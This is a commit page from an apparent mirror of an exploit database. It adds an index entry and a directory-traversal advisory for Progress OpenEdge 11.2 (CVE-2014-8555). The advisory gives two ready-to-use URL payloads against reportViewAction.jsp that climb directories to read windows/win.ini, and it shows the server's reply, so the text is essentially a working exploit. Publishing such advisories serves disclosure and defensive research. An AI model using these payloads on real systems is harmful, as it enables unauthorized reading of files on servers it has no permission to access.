bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 11_09_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-09 04:45:16 +00:00
parent af904ead9b
commit 173a7ded66
2 changed files with 72 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
files.csv
View file

@ -31644,6 +31644,7 @@ id,file,description,date,author,platform,type,port
35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0
35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0
35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"Mauricio Correa",jsp,webapps,9090
35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Stored XSS Vulnerability",2014-10-31,"Ravi Rajput",hardware,webapps,0
35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0
35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0

Can't render this file because it is too large.

71
platforms/jsp/webapps/35127.txt Executable file
View file

@ -0,0 +1,71 @@
# Exploit Title: Progress OpenEdge Directory Traversal
# Date: 30/10/2014
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.progress.com
# Software Link: www.progress.com/products/openedge
# Version: 11.2
# Tested on: Windows OS
# CVE : CVE-2014-8555
The malicious user sends a malformed request that generates the file access
up directories as follows:
http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.
.%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or else
http://
target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..
/../../windows/win.ini
And the application answers
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256
Thanks